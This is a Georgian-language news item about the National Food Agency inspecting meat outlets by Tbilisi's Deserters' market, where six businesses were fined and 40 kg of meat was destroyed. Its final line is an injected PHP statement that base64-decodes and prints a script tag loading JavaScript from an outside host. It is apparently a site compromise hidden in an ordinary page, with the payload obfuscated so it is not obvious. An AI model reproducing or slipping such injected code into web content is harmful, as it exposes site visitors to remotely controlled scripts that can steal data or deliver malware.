celsiusi
ავერსი შნაიდერი
სურსათის ეროვნული სააგენტო აგრარულ ბაზრებში და მიმდებარე ტერიტორიაზე არსებულ ხორცის სარეალიზაციო ობიექტებს ამოწმებს, - ამის შესახებ „ინტერპრესნიუსს“ სურსათის ეროვნული სააგენტოდან აცნობეს.
 
მათივე ინფორმაციით, თბილისის საქალაქო სამსახურის ინსპექტირების ჯგუფებმა სახელმწიფო კონტროლი განახორციელეს დეზერტირების ბაზრის მიმდებარე ტერიტორიაზე, ე.წოდებულ „გვირაბში“, სადაც წინა წლებში ხშირად აღინიშნებოდა დარღვევები.
 
„შემოწმებული 10 ობიექტიდან კრიტიკული შეუსაბამობების გამო, დაჯარიმდა და საწარმოო პროცესი შეუჩერდა 6 ბიზნესოპერატორს (5 ინდმეწარმეს და შპს „დანტეს“).ინსპექტირების შედეგად დაილუქა გაურკვევლი წარმომვლობის 40 კილოგრამი ხორცი, რომელიც კანონმდებლობის შესაბამისად, სააგენტოს უფლებამოსილი პირის ზედამხედველობით განადგურდა“, - ნათქვამია ინფორმაციაში.
 
1116
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");